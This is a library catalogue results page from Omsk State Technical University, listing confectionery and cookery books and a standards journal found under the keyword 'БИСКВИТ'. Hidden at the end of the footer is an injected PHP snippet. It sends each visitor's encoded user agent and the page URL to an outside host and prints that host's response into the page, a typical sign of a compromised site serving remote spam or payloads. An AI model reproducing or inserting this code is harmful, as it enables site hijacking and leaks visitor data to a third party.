Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

359 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БИСКВИТ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 7
1. 
Пирожные. Кремы. Глазури. Помадка [Текст] / дар. В. А. Козлова, 2000. - 78, [1] с.
Держатели документа (Информация об экземплярах) 
2. 
Стандарты и качество. - Журнал, 2009г. № 12
Оглавление 
  • Воронин, Геннадий. Слово главного редактора / Г. Воронин. - с.1
  • Воронин, Геннадий. Даешь безопасную энергетику! / Г. Воронин. - с.6-81
  • Томсон, Наталья Григорьевна. Азиатский путь качества / Н. Г. Томсон. - с.10-15
  • Кравченко, Юрий. Стандарты в борьбе с изменением климата / Ю. Кравченко. - с.16-20
  • Калита, Петр Яковлевич. Нет ничего, чего нельзя достичь / П. Я. Калита. - с.22-25
  • Суркова, Светлана. Инновации, качества, совершенствование / С. Суркова. - с.26-28
  • Пакет в сухом остатке. - с.30
  • Железобетонная безопасность. - с.31
  • Путь к прилавку. - с.32
  • Аронов, Иосиф Зиновьевич. Механизм анализа и выбора регулирующих воздействий в сфере оценки соответствия требованиям технических регламентов / И. З. Аронов, В. Г. Версан, А. М. Рыбакова. - с.34-37
  • Зорин, Вадим. Тайны российских молочников / В. Зорин. - с.38-40
  • Меметов, Риза Асанович. О доработке проекта закона "О стандартизации" / Р. А. Меметов, В. В. Варывдин. - с.42-44
  • Щербаков, Вячеслав. Бизнес и государство: кому стандартизация более необходима? / В. Щербаков. - с.46-48
  • Захаров, Олег Георгиевич. Опыт выпуска технических условий - стандарта организации / О. Г. Захаров. - с.50-53
  • Берновский, Юрий Наумович. Технические условия и стандарты организации / Ю. Н. Берновский. - с.52-53
  • Ермолаев, Борис Васильевич. Упорядочение терминологии для идентификации промышленной продукции / Б. В. Ермолаев, Г. С. Варанкина. - с.54-57
  • Новости международной стандартизации. - с.58-60
  • Огвоздин, Виталий Юрьевич. Кризис стандартов ИСО 9000. Что дальше? / В. Ю. Огвоздин. - с.62-66
  • Андросенко, Наталья Витальевна. Особенности построения и оценки интегрированных систем менеджмента с учетом бизнес-рисков / Н. В. Андросенко, Н. А. Бакштеева. - с.68-72
  • Громова, Елена Махмудовна. Система менеджмента безопасности как инструмент повышения качества жизни / Е. М. Громова. - с.73-74
  • Деревянко, Юрий Джанович. Инновационные аспекты СМК в вузе / Ю. Дж. Деревянко. - с.75-77
  • Окрепилова, Ирина Геннадьевна. Роль профессионального образования в создании системы стандартов качества жизни / И. Г. Окрепилова, С. К. Венедиктова. - с.78-80
  • Андрюшаев, Александр Михайлович. Статистический контроль квалификации персонала банка при эксплуатации информационной банковской системы "БИСквит" / А. М. Андрюшаев, В. А. Капитуров. - с.81
  • Оводенко, Анатолий Аркадьевич. Инновационные решения - основа совершенствованя качества подготовки специалистов в вузе / А. А. Оводенко, В. И. Хименко, А. П. Ястребов. - с.82-85
  • Родин, Юрий Иванович. Крепкое звено в цепи качества / Ю. И. Родин. - с.86-87
  • Комаров, Сергей Георгиевич. Синдром хронической усталости: болезнь цивилизации и индикатор качества и безопасности жизни / С. Г. Комаров, Г. А. Комаров. - с.88-90
  • Васильев, В. М. Сто дней у Форда / В. М. Васильев. - с.92-94
  • Здесь по-особенному дышится.... - с.96-97
  • Чеканов, Валерий. Слагаемые конкурентоспособности / В. Чеканов. - с.98-100
  • Додонов, Владимир. Интеграция идеи качества в систему управления / В. Додонов. - с.101-102
Держатели документа (Информация об экземплярах) 
3. 
Могильный, Михаил Петрович. Восточные сладости (технология, рецептура, рекомендации) [Текст] / М. П. Могильный ; дар. В. В. Арсеньев, 2002. - 147 с.
Держатели документа (Информация об экземплярах) 
4. 
Бутейкис, Нина Григорьевна. Технология приготовления мучных кондитерских изделий [Текст] / Н. Г. Бутейкис ; дар. В. В. Арсеньев, 2009. - 300, [1] с.
Держатели документа (Информация об экземплярах) 

Приведены сведения о сырье, предназначенном для изготовления хлебобулочных и кондитерских изделий, фаршей, кремов и различных полуфабрикатов, его подготовке и рациональном использовании, а также об изготовлении полуфабрикатов и готовых изделий и их отделке. Рассмотрена технология приготовления разнообразных хлебобулочных и кондитерских изделий, фаршей, кремов и полуфабрикатов, в том числе фирменных изделий из разных видов теста на предприятиях общественного питания.

В 7-е издание внесены изменения и дополнения, касающиеся использования в кондитерском производстве новых видов сырья и технологий новых изделий, по состояниию на 1 апреля 2008 г.

Для учащихся образовательных учреждений начального профессионального образования.

5. 
Микроволновая кухня каждый день [Текст] / сост. Ю. Р. Васильев ; дар. И. Ю. Морозов, 1995. - 383 с.
Держатели документа (Информация об экземплярах) 
6. 
Кулинария [Текст] / П. В. Абатуров [и др.] ; дар. В. С. Михайленко, 1955. - 959, [1] с.
Держатели документа (Информация об экземплярах) 
7. 
Шестакова Т. И. Кондитер-профессионал [Текст] : учеб. пособие / Т. И. Шестакова, 2006. - 399 с.
Ключевые слова 
МУКА ПШЕНИЧНАЯ -- МУКА СОЕВАЯ -- МУКА кукурузная -- КРАХМАЛ -- глюкоза -- фруктоза -- ПОДСЛАСТИТЕЛЬ -- патока крахмальная -- МЕД -- МОЛОКО -- ПРОДУКТЫ МОЛОЧНЫЕ -- МАСЛО СЛИВОЧНОЕ -- ЖИРЫ -- ЯЙЦА -- ЯЙЦЕПРОДУКТЫ -- ПРОДУКТЫ ВКУСОВЫЕ -- КИСЛОТА ПИЩЕВАЯ -- ВЕЩЕСТВА АРОМАТИЧЕСКИЕ -- РАЗРЫХЛИТЕЛЬ -- ФРУКТЫ -- ЦУКАТЫ -- КРУПА -- ОРЕХИ -- МАК -- УЛУЧШИТЕЛЬ хлебобулочных изделий -- ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА -- СЛИВКИ -- ИЗДЕЛИЯ КОНДИТЕРСКИЕ -- ФАРШ -- ТЕСТО дрожжевое -- КУЛИЧИ -- БАБА РОМОВАЯ -- ТЕСТО бездрожжевое -- ВАТРУШКА -- ТЕСТО ПРЯНИЧНОЕ -- ТЕСТО ПЕСОЧНОЕ -- БИСКВИТ -- ТЕСТО ЗАВАРНОЕ -- ТЕСТО СЛОЕНОЕ -- волованы -- ФРИТЮР -- ПЕЧЕНЬЕ -- КЕКС -- ПИЦЦА -- СЛАДОСТИ ВОСТОЧНЫЕ -- СИРОП -- помадка -- ГЛАЗУРИ -- мастика -- КАРАМЕЛЬ -- кандир для сахарных фигур -- грильяж -- ЖЕЛЕ -- марципан -- ШОКОЛАД -- посыпки -- КРЕМ -- ПИРОЖНЫЕ -- ТОРТЫ
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2842 - 22.03.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.79 с.14 запросов, 0.56c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;